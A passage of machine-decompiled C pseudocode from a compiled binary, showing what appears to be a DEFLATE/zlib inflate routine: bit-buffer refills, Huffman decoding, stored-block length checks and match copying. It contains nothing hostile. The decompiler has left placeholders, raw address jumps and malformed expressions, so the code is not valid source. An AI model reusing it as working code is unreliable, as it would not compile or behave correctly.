				signed int _t685;
				signed int _t688;
				signed int _t689;
				signed int _t690;
				signed int _t695;
				unsigned int _t698;
				void* _t699;
				signed int _t707;
				signed int _t710;
				signed int _t721;
				signed int _t725;
				signed int _t727;
				void* _t730;
				signed int _t732;
				signed int _t733;
				intOrPtr _t734;
				signed char _t738;
				intOrPtr* _t740;
				void* _t741;
				signed int _t749;
				signed int _t753;
				signed int _t758;
				signed int _t764;
				signed int _t767;
				void* _t769;
				intOrPtr _t782;
				intOrPtr _t783;
				intOrPtr _t784;
				signed int _t787;
				signed int _t791;
				void* _t797;
				signed int _t802;
				signed int _t804;
				signed int _t808;
				signed int _t812;
				signed int _t815;
				signed int _t819;
				void* _t824;
				signed int _t828;
				void* _t829;
				signed int _t834;
				void* _t835;
				void* _t836;
				signed int _t841;
				signed int _t842;
				signed char _t844;
				signed int _t845;
				void* _t847;
				void* _t851;
				signed int _t853;
				intOrPtr _t854;
				signed char _t860;
				signed int _t861;
				signed int _t862;
				signed char _t863;
				signed char _t864;
				intOrPtr _t866;
				void* _t869;
				void* _t870;
				void* _t871;
				signed int _t874;
				signed int _t877;
				void* _t878;
				void* _t879;
				void* _t880;
				void* _t881;
				void* _t882;
				void* _t883;
				void* _t884;
				void* _t885;
				signed char _t894;
				signed int _t896;
				void* _t897;
				void* _t898;
				signed int _t901;
				signed int _t902;
				signed char _t903;
				intOrPtr _t905;
				intOrPtr _t907;
				void* _t910;
				signed char _t911;
				signed char _t912;
				signed char _t913;
				signed int _t917;
				signed char _t922;
				void* _t923;
				void* _t924;
				signed int _t927;
				signed char* _t932;
				signed int _t936;
				signed char _t940;
				signed int _t941;
				signed char _t944;
				signed int _t945;
				void* _t953;
				signed int _t968;
				signed int _t969;
				signed int _t972;
				signed int _t974;
				signed int _t978;
				signed int* _t979;
				signed char* _t984;
				void* _t985;
				void* _t990;
				signed int _t991;
				signed int _t994;
				signed int _t995;
				signed int _t997;
				signed int _t999;
				signed int _t1000;
				signed int _t1003;
				signed int _t1004;
				int _t1005;
				int _t1007;
				signed int _t1008;
				unsigned int _t1011;
				void* _t1015;
				intOrPtr _t1016;
				signed int _t1017;
				signed int _t1021;
				signed char _t1025;
				void* _t1029;
				signed char _t1030;
				signed int _t1031;
				void* _t1033;
				void* _t1035;
				unsigned int _t1036;
				signed int _t1037;
				void* _t1039;
				void* _t1041;
				int _t1046;
				signed int _t1047;
				signed int _t1049;
				signed int _t1050;
				unsigned int _t1052;
				signed int _t1053;
				unsigned int _t1055;
				signed int _t1056;
				signed char _t1064;
				void* _t1065;
				void* _t1067;
				void* _t1068;

				L0:
				while(1) {
					L0:
					_t597 = __eax + 1 - 0x20;
					 *_t597 =  *_t597 + _t597;
					_t847 = __ebx + _t597;
					_t598 = _t597 + 1;
					 *_t598 =  *_t598 ^ _t598;
					 *_t598 = _t598 +  *_t598;
					 *0xde0 =  *0xde0 + _t598;
					memset(_t598, ??, ??);
					asm("movdqa xmm0, [0x41e1ae0]");
					_t1068 = _t1067 + 0xc;
					asm("movdqu [edi+0x40], xmm0");
					asm("movdqu [edi+0x50], xmm0");
					asm("movdqu [edi+0x60], xmm0");
					asm("movdqu [edi+0x70], xmm0");
					asm("movdqu [edi+0x80], xmm0");
					asm("movdqu [edi+0x90], xmm0");
					asm("movdqu [edi+0xa0], xmm0");
					asm("movdqu [edi+0xb0], xmm0");
					asm("movdqu [edi+0xc0], xmm0");
					_t1029 = __edi + 0xd0;
					asm("movdqa xmm0, [0x41e1af0]");
					asm("movdqu [edi], xmm0");
					asm("movdqu [edi+0x10], xmm0");
					asm("movdqu [edi+0x20], xmm0");
					asm("movdqu [edi+0x30], xmm0");
					asm("movdqu [edi+0x40], xmm0");
					asm("movdqu [edi+0x50], xmm0");
					asm("movdqu [edi+0x60], xmm0");
					asm("movdqa xmm0, [0x41e1ad0]");
					asm("movdqu [edi+0x70], xmm0");
					asm("movq [edi+0x80], xmm0");
					 *((intOrPtr*)(_t1029 + 0x88)) = 0x8080808;
					 *((intOrPtr*)(_t1029 + 0x8c)) = 0x8080808;
					_t1030 =  *(_t1065 - 0x14);
					while(1) {
						L141:
						_t600 =  *(_t1030 + 0x18);
						if(_t600 >= 0) {
							break;
						}
						L218:
						_t968 =  *(_t1065 - 4);
						while(1) {
							L39:
							_t860 =  *(_t1065 - 0x20) - _t847;
							__eflags = _t860 - 4;
							if(_t860 < 4) {
								goto L58;
							}
							L40:
							_t1030 =  *(_t1065 - 0x14);
							__eflags =  *((intOrPtr*)(_t1065 - 0x40)) -  *(_t1065 - 0x10) - 2;
							if( *((intOrPtr*)(_t1065 - 0x40)) -  *(_t1065 - 0x10) < 2) {
								goto L58;
							} else {
								L41:
								__eflags = _t1050 - 0xf;
								if(_t1050 < 0xf) {
									_t1017 =  *(_t847 + 1) & 0x000000ff;
									_t860 = _t1050;
									_t733 =  *_t847 & 0x000000ff;
									_t847 = _t847 + 2;
									 *(_t1065 - 0x18) = _t847;
									 *(_t1065 - 4) =  *(_t1065 - 4) | (_t1017 << 0x00000008 | _t733) << _t860;
									_t1050 = _t1050 + 0x10;
									__eflags = _t1050;
									_t968 =  *(_t1065 - 4);
								}
								_t618 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
								 *(_t1065 - 8) = _t618;
								__eflags = _t618;
								if(_t618 < 0) {
									L45:
									goto 0x41f145c;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L46:
										_t685 = _t968 >> _t860;
										_t860 = _t860 + 1;
										_t618 = (_t685 & 0x00000001) +  !_t847;
										_t847 =  *((short*)(_t1030 + 0x960 + _t618 * 2));
										__eflags = _t847;
									} while (_t847 < 0);
									 *(_t1065 - 8) = _t847;
									_t847 =  *(_t1065 - 0x18);
								} else {
									L44:
									_t860 = _t618 >> 9;
								}
								L48:
								_t968 = _t968 >> _t860;
								_t1050 = _t1050 - _t860;
								_t861 =  *(_t1065 - 8);
								 *(_t1065 - 4) = _t968;
								__eflags = _t861 & 0x00000100;
								if((_t861 & 0x00000100) != 0) {
									L84:
									_t862 = _t861 & 0x000001ff;
									 *(_t1065 - 8) = _t862;
									__eflags = _t862 - 0x100;
									if(_t862 != 0x100) {
										L219:
										_t608 = _t862 * 4 - 0x404;
										_t863 =  *(_t608 + 0x41e1010);
										_t609 =  *(_t608 + 0x41e1a48);
										 *(_t1065 - 0x38) = _t863;
										 *(_t1065 - 8) = _t609;
										__eflags = _t863;
										if(_t863 == 0) {
											L225:
											__eflags = _t1050 - 0xf;
											if(_t1050 >= 0xf) {
												L3:
												_t612 =  *((short*)(_t1030 + 0xf00 + (_t968 & 0x000003ff) * 2));
												 *(_t1065 - 0x1c) = _t612;
												__eflags = _t612;
												if(_t612 < 0) {
													L5:
													goto 0x41f13e3;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L7:
														_t614 = _t968 >> _t863;
														_t863 = _t863 + 1;
														_t847 =  *((short*)(_t1030 + 0x1700 + ((_t614 & 0x00000001) +  !_t847) * 2));
														__eflags = _t847;
													} while (_t847 < 0);
													 *(_t1065 - 0x1c) = _t847;
													_t847 =  *(_t1065 - 0x18);
													_t617 =  *(_t1065 - 0x1c);
												} else {
													L4:
													_t863 = _t612 >> 9;
													_t617 = _t612 & 0x000001ff;
												}
												L9:
												_t968 = _t968 >> _t863;
												_t1050 = _t1050 - _t863;
												_t864 =  *(0x41e1090 + _t617 * 4);
												_t618 =  *(0x41e1110 + _t617 * 4);
												 *(_t1065 - 4) = _t968;
												 *(_t1065 - 0x38) = _t864;
												 *(_t1065 - 0x28) = _t618;
												__eflags = _t864;
												if(_t864 == 0) {
													L15:
													_t866 =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 + 0xc));
													 *((intOrPtr*)(_t1065 - 0x48)) = _t866;
													__eflags = _t618 - _t866;
													if(_t618 <= _t866) {
														L17:
														_t1030 =  *(_t1065 - 0x14);
														_t869 = (_t866 - _t618 &  *(_t1065 - 0x34)) +  *((intOrPtr*)(_t1065 + 0xc));
														__eflags =  *(_t1065 - 0x10) - _t869;
														 *(_t1065 - 0xc) = _t869;
														_t620 =  >  ?  *(_t1065 - 0x10) : _t869;
														_t870 =  *(_t1065 - 8);
														_t621 = ( >  ?  *(_t1065 - 0x10) : _t869) + _t870;
														__eflags = ( >  ?  *(_t1065 - 0x10) : _t869) + _t870 -  *((intOrPtr*)(_t1065 - 0x40));
														if(( >  ?  *(_t1065 - 0x10) : _t869) + _t870 <=  *((intOrPtr*)(_t1065 - 0x40))) {
															L21:
															__eflags = _t870 - 9;
															if(_t870 < 9) {
																L30:
																goto 0x41f1420;
																asm("int3");
																do {
																	L32:
																	_t870 = _t870 - 3;
																	 *_t1030 =  *_t968 & 0x000000ff;
																	 *((char*)(_t1030 + 1)) =  *(_t968 + 1) & 0x000000ff;
																	_t624 =  *(2 + _t968) & 0x000000ff;
																	_t968 = _t968 + 3;
																	 *(2 + _t1030) = _t624;
																	_t1030 = _t1030 + 3;
																	__eflags = _t870 - 2;
																} while (_t870 > 2);
																goto L33;
															} else {
																L22:
																__eflags = _t870 -  *(_t1065 - 0x28);
																if(_t870 >  *(_t1065 - 0x28)) {
																	goto L30;
																} else {
																	L23:
																	_t1041 =  *(_t1065 - 0xc);
																	_t871 =  *(_t1065 - 0x10);
																	_t738 = _t1041 + (_t870 & 0xfffffff8);
																	 *(_t1065 - 0x24) = _t738;
																	_t1025 = _t738;
																	do {
																		L24:
																		 *_t871 =  *_t1041;
																		_t740 =  *((intOrPtr*)(_t1041 + 4));
																		_t1041 = _t1041 + 8;
																		 *((intOrPtr*)(_t871 + 4)) = _t740;
																		_t871 = _t871 + 8;
																		__eflags = _t1041 - _t1025;
																	} while (_t1041 < _t1025);
																	_t968 =  *(_t1065 - 4);
																	 *(_t1065 - 0x10) = _t871;
																	_t870 =  *(_t1065 - 8) & 0x00000007;
																	 *(_t1065 - 0xc) = _t1041;
																	_t1030 =  *(_t1065 - 0x14);
																	 *(_t1065 - 8) = _t870;
																	__eflags = _t870 - 3;
																	if(_t870 >= 3) {
																		goto L30;
																	} else {
																		goto L26;
																	}
																}
															}
															continue;
														} else {
															while(1) {
																L18:
																_t741 = _t870;
																_t870 = _t870 - 1;
																 *(_t1065 - 8) = _t870;
																__eflags = _t741;
																if(_t741 == 0) {
																	goto L39;
																}
																L19:
																__eflags =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 - 0x40));
																if( *(_t1065 - 0x10) >=  *((intOrPtr*)(_t1065 - 0x40))) {
																	L238:
																	 *(_t1065 - 0xc) = 2;
																	 *_t1030 = 0x35;
																	goto L292;
																} else {
																	L20:
																	 *(_t1065 - 0x10) =  *(_t1065 - 0x10) + 1;
																	 *((intOrPtr*)(_t1065 - 0x48)) =  *((intOrPtr*)(_t1065 - 0x48)) + 1;
																	 *( *(_t1065 - 0x10)) =  *((intOrPtr*)(( *((intOrPtr*)(_t1065 - 0x48)) -  *(_t1065 - 0x28) &  *(_t1065 - 0x34)) +  *((intOrPtr*)(_t1065 + 0xc))));
																	_t968 =  *(_t1065 - 4);
																	continue;
																}
																goto L295;
															}
															while(1) {
																L39:
																_t860 =  *(_t1065 - 0x20) - _t847;
																__eflags = _t860 - 4;
																if(_t860 < 4) {
																	goto L58;
																}
																goto L40;
															}
															goto L58;
														}
													} else {
														L16:
														__eflags =  *(_t1065 + 0x18) & 0x00000004;
														if(( *(_t1065 + 0x18) & 0x00000004) != 0) {
															L270:
															_t689 = _t618 | 0xffffffff;
															 *_t1030 = 0x25;
															goto L291;
														} else {
															goto L17;
														}
													}
												} else {
													L10:
													__eflags = _t1050 - _t864;
													if(_t1050 >= _t864) {
														L13:
														_t1050 = _t1050 - _t864;
														_t749 = (_t618 << _t864) - 0x00000001 & _t968;
														_t968 = _t968 >> _t864;
														_t28 = _t1065 - 0x28;
														 *_t28 =  *(_t1065 - 0x28) + _t749;
														__eflags =  *_t28;
														_t618 =  *(_t1065 - 0x28);
														 *(_t1065 - 4) = _t968;
														goto L15;
													} else {
														while(1) {
															L11:
															__eflags = _t847 -  *(_t1065 - 0x20);
															if(_t847 >=  *(_t1065 - 0x20)) {
																break;
															}
															L12:
															_t618 = ( *_t847 & 0x000000ff) << _t1050;
															_t847 = _t847 + 1;
															_t864 =  *(_t1065 - 0x38);
															_t968 = _t968 | _t618;
															_t1050 = _t1050 + 8;
															 *(_t1065 - 0x18) = _t847;
															 *(_t1065 - 4) = _t968;
															__eflags = _t1050 - _t864;
															if(_t1050 < _t864) {
																continue;
															} else {
																goto L13;
															}
															goto L295;
														}
														L263:
														 *_t1030 = 0x1b;
														goto L285;
													}
												}
											} else {
												L226:
												__eflags =  *(_t1065 - 0x20) - _t847 - 2;
												if( *(_t1065 - 0x20) - _t847 >= 2) {
													L237:
													_t991 =  *(_t847 + 1) & 0x000000ff;
													_t753 =  *_t847 & 0x000000ff;
													_t847 = _t847 + 2;
													_t1030 =  *(_t1065 - 0x14);
													_t863 = _t1050;
													 *(_t1065 - 0x18) = _t847;
													 *(_t1065 - 4) =  *(_t1065 - 4) | _t991 << _t1050 + 0x00000008 | _t753 << _t863;
													_t1050 = _t1050 + 0x10;
													_t968 =  *(_t1065 - 4);
												} else {
													do {
														L227:
														_t618 =  *((short*)(_t1030 + 0xf00 + (_t968 & 0x000003ff) * 2));
														 *(_t1065 - 0x24) = _t618;
														__eflags = _t618;
														if(_t618 < 0) {
															L231:
															__eflags = _t1050 - 0xa;
															if(_t1050 <= 0xa) {
																goto L1;
															} else {
																L232:
																L233:
																 *(_t1065 - 0x1c) = _t863;
																while(1) {
																	L234:
																	_t863 =  *((short*)(_t1030 + 0x1700 + ((_t968 >> _t863 & 0x00000001) +  !( *(_t1065 - 0x24))) * 2));
																	_t764 =  *(_t1065 - 0x1c) + 1;
																	 *(_t1065 - 0x24) = _t863;
																	 *(_t1065 - 0x1c) = _t764;
																	__eflags = _t863;
																	if(_t863 >= 0) {
																		goto L3;
																	}
																	L235:
																	_t618 = _t764 + 1;
																	__eflags = _t1050 - _t618;
																	if(_t1050 < _t618) {
																		goto L1;
																	} else {
																		L236:
																		_t863 =  *(_t1065 - 0x1c);
																		continue;
																	}
																	goto L295;
																}
																goto L3;
															}
														} else {
															L228:
															_t618 = _t618 >> 9;
															__eflags = _t618;
															if(_t618 == 0) {
																L1:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	L264:
																	 *_t1030 = 0x1a;
																	goto L285;
																} else {
																	goto L2;
																}
															} else {
																L229:
																__eflags = _t1050 - _t618;
																if(_t1050 >= _t618) {
																	goto L3;
																} else {
																	L230:
																	goto L1;
																}
															}
														}
														goto L295;
														L2:
														_t863 = _t1050;
														_t758 = ( *_t847 & 0x000000ff) << _t863;
														_t847 = _t847 + 1;
														_t968 = _t968 | _t758;
														 *(_t1065 - 0x18) = _t847;
														_t1050 = _t1050 + 8;
														 *(_t1065 - 4) = _t968;
														__eflags = _t1050 - 0xf;
													} while (_t1050 < 0xf);
												}
												goto L3;
											}
										} else {
											L220:
											__eflags = _t1050 - _t863;
											if(_t1050 >= _t863) {
												L223:
												L224:
												_t1050 = _t1050 - _t863;
												_t767 = (_t609 << _t863) - 0x00000001 & _t968;
												_t968 = _t968 >> _t863;
												_t456 = _t1065 - 8;
												 *_t456 =  *(_t1065 - 8) + _t767;
												__eflags =  *_t456;
												 *(_t1065 - 4) = _t968;
												goto L225;
											} else {
												while(1) {
													L221:
													__eflags = _t847 -  *(_t1065 - 0x20);
													if(_t847 >=  *(_t1065 - 0x20)) {
														break;
													}
													L222:
													_t618 = ( *_t847 & 0x000000ff) << _t1050;
													_t847 = _t847 + 1;
													_t863 =  *(_t1065 - 0x38);
													_t968 = _t968 | _t618;
													_t1050 = _t1050 + 8;
													 *(_t1065 - 0x18) = _t847;
													 *(_t1065 - 4) = _t968;
													__eflags = _t1050 - _t863;
													if(_t1050 < _t863) {
														continue;
													} else {
														goto L223;
													}
													goto L295;
												}
												L262:
												 *_t1030 = 0x19;
												goto L285;
											}
										}
									} else {
										while(1) {
											L85:
											__eflags =  *(_t1030 + 0x14) & 0x00000001;
											if(( *(_t1030 + 0x14) & 0x00000001) != 0) {
												break;
											}
											L86:
											__eflags = _t1050 - 3;
											if(_t1050 >= 3) {
												L89:
												_t1050 = _t1050 - 3;
												_t698 = _t968 & 0x00000007;
												_t999 = _t968 >> 3;
												 *(_t1030 + 0x14) = _t698;
												_t699 = _t698 >> 1;
												__eflags = _t699;
												 *(_t1065 - 4) = _t999;
												 *(_t1065 - 0x1c) = _t1050;
												 *(_t1030 + 0x18) = _t699;
												if(_t699 != 0) {
													L124:
													__eflags = _t699 - 3;
													if(_t699 == 3) {
														L266:
														 *(_t1065 - 0xc) = 0xffffffff;
														 *_t1030 = 0xa;
														goto L292;
													} else {
														L125:
														__eflags = _t699 - 1;
														if(__eflags != 0) {
															L127:
															_t901 = 0;
															__eflags = 0;
															while(1) {
																L128:
																 *(_t1065 - 8) = _t901;
																__eflags = _t901 - 3;
																if(_t901 >= 3) {
																	break;
																}
																L129:
																_t618 =  *((char*)(_t901 + 0x41e1004));
																 *(_t1065 - 0x1c) = _t618;
																__eflags = _t1050 - _t618;
																if(_t1050 >= _t618) {
																	L132:
																	_t1015 = _t1030 + _t901 * 4;
																	_t1036 =  *(_t1065 - 4);
																	 *(_t1015 + 0x2c) = (0x00000001 <<  *(_t1065 - 0x1c)) - 0x00000001 & _t1036;
																	_t707 =  *(_t1065 - 8);
																	_t940 =  *((char*)(_t707 + 0x41e1004));
																	_t1037 = _t1036 >> _t940;
																	_t1050 = _t1050 - _t940;
																	_t941 = _t707;
																	 *(_t1065 - 4) = _t1037;
																	 *(_t1065 - 0x1c) = _t1050;
																	 *(_t1015 + 0x2c) =  *(_t1015 + 0x2c) +  *((intOrPtr*)(0x41e1a38 + _t941 * 4));
																	_t999 = _t1037;
																	_t1030 =  *(_t1065 - 0x14);
																	_t901 = _t941 + 1;
																	continue;
																} else {
																	while(1) {
																		L130:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L131:
																		_t710 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t901 =  *(_t1065 - 8);
																		_t999 = _t999 | _t710;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 0x18) = _t847;
																		 *(_t1065 - 4) = _t999;
																		_t618 =  *((char*)(_t901 + 0x41e1004));
																		 *(_t1065 - 0x1c) = _t618;
																		__eflags = _t1050 - _t618;
																		if(_t1050 < _t618) {
																			continue;
																		} else {
																			goto L132;
																		}
																		goto L295;
																	}
																	L248:
																	 *_t1030 = 0xb;
																	goto L285;
																}
																goto L295;
															}
															L133:
															L134:
															_t618 = memset(_t1030 + 0x1b80, 0, ??);
															_t1000 =  *(_t1065 - 4);
															_t1068 = _t1068 + 0xc;
															_t902 = 0;
															__eflags = 0;
															while(1) {
																L135:
																 *(_t1065 - 8) = _t902;
																__eflags = _t902 -  *((intOrPtr*)(_t1030 + 0x34));
																if(__eflags >= 0) {
																	break;
																}
																L136:
																__eflags = _t1050 - 3;
																if(_t1050 >= 3) {
																	L139:
																	_t936 = _t1000 & 0x00000007;
																	_t1000 = _t1000 >> 3;
																	_t1050 = _t1050 - 3;
																	 *(_t1065 - 4) = _t1000;
																	 *(_t1065 - 0x1c) = _t1050;
																	_t618 =  *( *(_t1065 - 8) + 0x41e1a24) & 0x000000ff;
																	 *(_t1030 + 0x1b80 + _t618) = _t936;
																	_t902 =  *(_t1065 - 8) + 1;
																	continue;
																} else {
																	while(1) {
																		L137:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L138:
																		_t618 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t1000 = _t1000 | _t618;
																		 *(_t1065 - 0x18) = _t847;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 4) = _t1000;
																		__eflags = _t1050 - 3;
																		if(_t1050 < 3) {
																			continue;
																		} else {
																			goto L139;
																		}
																		goto L295;
																	}
																	L249:
																	 *_t1030 = 0xe;
																	goto L285;
																}
																goto L295;
															}
															L140:
															 *((intOrPtr*)(_t1030 + 0x34)) = 0x13;
															goto L141;
														} else {
															L126:
															goto 0x41f14d8;
															asm("int3");
															asm("int3");
															 *((intOrPtr*)(_t699 + 0x2c)) = 0x120;
															goto L0;
														}
													}
												} else {
													L90:
													_t618 = _t1050 & 0x00000007;
													__eflags = _t1050 - _t618;
													if(_t1050 >= _t618) {
														L93:
														_t944 = _t1050 & 0x00000007;
														_t968 = _t999 >> _t944;
														_t1050 = _t1050 - _t944;
														 *(_t1065 - 4) = _t968;
														_t945 = 0;
														__eflags = 0;
														while(1) {
															L94:
															 *(_t1065 - 8) = _t945;
															__eflags = _t945 - 4;
															if(_t945 >= 4) {
																break;
															}
															L95:
															__eflags = _t1050;
															if(_t1050 == 0) {
																L101:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	L244:
																	 *_t1030 = 7;
																	goto L285;
																} else {
																	L102:
																	_t618 =  *_t847;
																	_t847 = _t847 + 1;
																	(_t1030 + 0x2920)[_t945] = _t618;
																	_t945 = _t945 + 1;
																	 *(_t1065 - 0x18) = _t847;
																	continue;
																}
															} else {
																L96:
																__eflags = _t1050 - 8;
																if(_t1050 >= 8) {
																	L100:
																	(_t1030 + 0x2920)[_t945] = _t968;
																	_t1050 = _t1050 - 8;
																	_t968 = _t968 >> 8;
																	_t945 = _t945 + 1;
																	 *(_t1065 - 4) = _t968;
																	continue;
																} else {
																	while(1) {
																		L97:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L98:
																		_t618 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t968 = _t968 | _t618;
																		 *(_t1065 - 0x18) = _t847;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 4) = _t968;
																		__eflags = _t1050 - 8;
																		if(_t1050 < 8) {
																			continue;
																		} else {
																			L99:
																			_t945 =  *(_t1065 - 8);
																			goto L100;
																		}
																		goto L295;
																	}
																	L243:
																	 *_t1030 = 6;
																	goto L285;
																}
															}
															goto L295;
														}
														L103:
														_t618 =  *(_t1030 + 0x2922) & 0x000000ff;
														 *(_t1065 - 8) = ( *(_t1030 + 0x2921) & 0x000000ff) << 0x00000008 |  *(_t1030 + 0x2920) & 0x000000ff;
														__eflags =  *(_t1065 - 8) - ((( *(_t1030 + 0x2923) & 0x000000ff) << 0x00000008 | _t618) ^ 0x0000ffff);
														if( *(_t1065 - 8) != ((( *(_t1030 + 0x2923) & 0x000000ff) << 0x00000008 | _t618) ^ 0x0000ffff)) {
															L265:
															 *(_t1065 - 0xc) = 0xffffffff;
															 *_t1030 = 0x27;
															goto L292;
														} else {
															L104:
															_t953 =  *(_t1065 - 8);
															while(1) {
																L105:
																__eflags = _t953;
																if(_t953 == 0) {
																	goto L85;
																}
																L106:
																__eflags = _t1050;
																if(_t1050 == 0) {
																	L113:
																	_t618 =  *(_t1065 - 0x10);
																	while(1) {
																		L114:
																		__eflags = _t953;
																		if(_t953 == 0) {
																			break;
																		}
																		L116:
																		_t1016 =  *((intOrPtr*)(_t1065 - 0x40));
																		__eflags = _t618 - _t1016;
																		if(_t618 < _t1016) {
																			L118:
																			_t618 =  *(_t1065 - 0x20);
																			__eflags = _t847 - _t618;
																			if(_t847 >= _t618) {
																				L247:
																				_t1030 =  *(_t1065 - 0x14);
																				 *_t1030 = 0x26;
																				goto L285;
																			} else {
																				L119:
																				_t968 = _t1016 -  *(_t1065 - 0x10);
																				_t1039 = _t618 - _t847;
																				__eflags = _t968 - _t1039;
																				_t715 =  <  ? _t968 : _t1039;
																				__eflags = ( <  ? _t968 : _t1039) - _t953;
																				if(( <  ? _t968 : _t1039) >= _t953) {
																					_t1030 = _t953;
																				} else {
																					__eflags = _t968 - _t1039;
																					_t1030 =  <  ? _t968 : _t1039;
																				}
																				L122:
																				L123:
																				memcpy();
																				_t847 = _t847 + _t1030;
																				_t618 =  *(_t1065 - 0x10) + _t1030;
																				_t1068 = _t1068 + 0xc;
																				 *(_t1065 - 0x18) = _t847;
																				_t953 =  *(_t1065 - 8) - _t1030;
																				 *(_t1065 - 0x10) = _t618;
																				 *(_t1065 - 8) = _t953;
																				continue;
																			}
																		} else {
																			L117:
																			_t1030 =  *(_t1065 - 0x14);
																			 *(_t1065 - 0xc) = 2;
																			 *_t1030 = 9;
																			goto L292;
																		}
																		goto L295;
																	}
																	L115:
																	goto 0x41f14b1;
																	asm("int3");
																	goto L85;
																} else {
																	L107:
																	__eflags = _t1050 - 8;
																	if(_t1050 >= 8) {
																		L110:
																		_t618 = _t968 & 0x000000ff;
																		_t968 = _t968 >> 8;
																		_t1050 = _t1050 - 8;
																		 *(_t1065 - 0x28) = _t618;
																		 *(_t1065 - 4) = _t968;
																		L111:
																		__eflags =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 - 0x40));
																		_t1030 =  *(_t1065 - 0x14);
																		if( *(_t1065 - 0x10) >=  *((intOrPtr*)(_t1065 - 0x40))) {
																			L246:
																			 *(_t1065 - 0xc) = 2;
																			 *_t1030 = 0x34;
																			goto L292;
																		} else {
																			L112:
																			 *(_t1065 - 0x10) =  *(_t1065 - 0x10) + 1;
																			 *( *(_t1065 - 0x10)) = _t618;
																			_t953 =  *(_t1065 - 8) - 1;
																			 *(_t1065 - 8) = _t953;
																			continue;
																		}
																	} else {
																		while(1) {
																			L108:
																			__eflags = _t847 -  *(_t1065 - 0x20);
																			if(_t847 >=  *(_t1065 - 0x20)) {
																				break;
																			}
																			L109:
																			_t618 = ( *_t847 & 0x000000ff) << _t1050;
																			_t847 = _t847 + 1;
																			_t968 = _t968 | _t618;
																			 *(_t1065 - 0x18) = _t847;
																			_t1050 = _t1050 + 8;
																			 *(_t1065 - 4) = _t968;
																			__eflags = _t1050 - 8;
																			if(_t1050 < 8) {
																				continue;
																			} else {
																				goto L110;
																			}
																			goto L295;
																		}
																		L245:
																		 *_t1030 = 0x33;
																		goto L285;
																	}
																}
																goto L295;
															}
															continue;
														}
													} else {
														while(1) {
															L91:
															__eflags = _t847 -  *(_t1065 - 0x20);
															if(_t847 >=  *(_t1065 - 0x20)) {
																break;
															}
															L92:
															_t721 = ( *_t847 & 0x000000ff) << _t1050;
															_t1050 = _t1050 + 8;
															_t999 = _t999 | _t721;
															_t847 = _t847 + 1;
															 *(_t1065 - 0x18) = _t847;
															_t618 = _t1050 & 0x00000007;
															 *(_t1065 - 4) = _t999;
															__eflags = _t1050 - _t618;
															if(_t1050 < _t618) {
																continue;
															} else {
																goto L93;
															}
															goto L295;
														}
														L242:
														 *_t1030 = 5;
														goto L285;
													}
												}
											} else {
												while(1) {
													L87:
													__eflags = _t847 -  *(_t1065 - 0x20);
													if(_t847 >=  *(_t1065 - 0x20)) {
														break;
													}
													L88:
													_t618 = ( *_t847 & 0x000000ff) << _t1050;
													_t847 = _t847 + 1;
													_t968 = _t968 | _t618;
													 *(_t1065 - 0x18) = _t847;
													_t1050 = _t1050 + 8;
													 *(_t1065 - 4) = _t968;
													__eflags = _t1050 - 3;
													if(_t1050 < 3) {
														continue;
													} else {
														goto L89;
													}
													goto L295;
												}
												L241:
												 *_t1030 = 3;
												L285:
												__eflags =  *(_t1065 + 0x18) & 0x00000002;
												L286:
												L287:
												_t628 =  !=  ? 1 : _t618;
												 *(_t1065 - 0xc) = _t628;
												__eflags = _t628 - 1;
												if(_t628 != 1) {
													L288:
													__eflags = _t628 - 0xfffffffc;
													if(_t628 != 0xfffffffc) {
														L289:
														L292:
														_t673 =  *(_t1065 - 0x3c);
														__eflags = _t847 - _t673;
														if(_t847 > _t673) {
															while(1) {
																L293:
																__eflags = _t1050 - 8;
																if(_t1050 < 8) {
																	goto L295;
																}
																L294:
																_t847 = _t847 - 1;
																_t1050 = _t1050 - 8;
																__eflags = _t847 - _t673;
																if(_t847 > _t673) {
																	continue;
																}
																goto L295;
															}
														}
													}
												}
											}
											goto L295;
										}
										L252:
										_t618 = _t1050 & 0x00000007;
										__eflags = _t1050 - _t618;
										if(_t1050 >= _t618) {
											L256:
											_t688 =  *(_t1065 - 0x3c);
											_t894 = _t1050 & 0x00000007;
											_t994 = _t968 >> _t894;
											_t1050 = _t1050 - _t894;
											 *(_t1065 - 4) = _t994;
											__eflags = _t847 - _t688;
											if(_t847 > _t688) {
												while(1) {
													L257:
													__eflags = _t1050 - 8;
													if(_t1050 < 8) {
														goto L259;
													}
													L258:
													_t847 = _t847 - 1;
													_t1050 = _t1050 - 8;
													__eflags = _t847 - _t688;
													if(_t847 > _t688) {
														continue;
													}
													goto L259;
												}
											}
											L259:
											L260:
											_t618 = _t1050;
											asm("bts edx, eax");
											__eflags = _t618 - 0x20;
											_t896 =  >=  ? _t994 : 0;
											_t995 = _t994 ^ _t896;
											__eflags = _t618 - 0x40;
											_t897 =  >=  ? _t995 : _t896;
											 *(_t1065 - 4) =  *(_t1065 - 4) & _t995 - 0x00000001;
											__eflags =  *(_t1065 + 0x18) & 0x00000001;
											if(( *(_t1065 + 0x18) & 0x00000001) == 0) {
												L290:
												_t689 = 0;
												__eflags = 0;
												 *_t1030 = 0x22;
												L291:
												 *(_t1065 - 0xc) = _t689;
												goto L292;
											} else {
												L261:
												_t898 = 0;
												while(1) {
													L277:
													 *(_t1065 - 8) = _t898;
													__eflags = _t898 - 4;
													if(_t898 >= 4) {
														goto L290;
													}
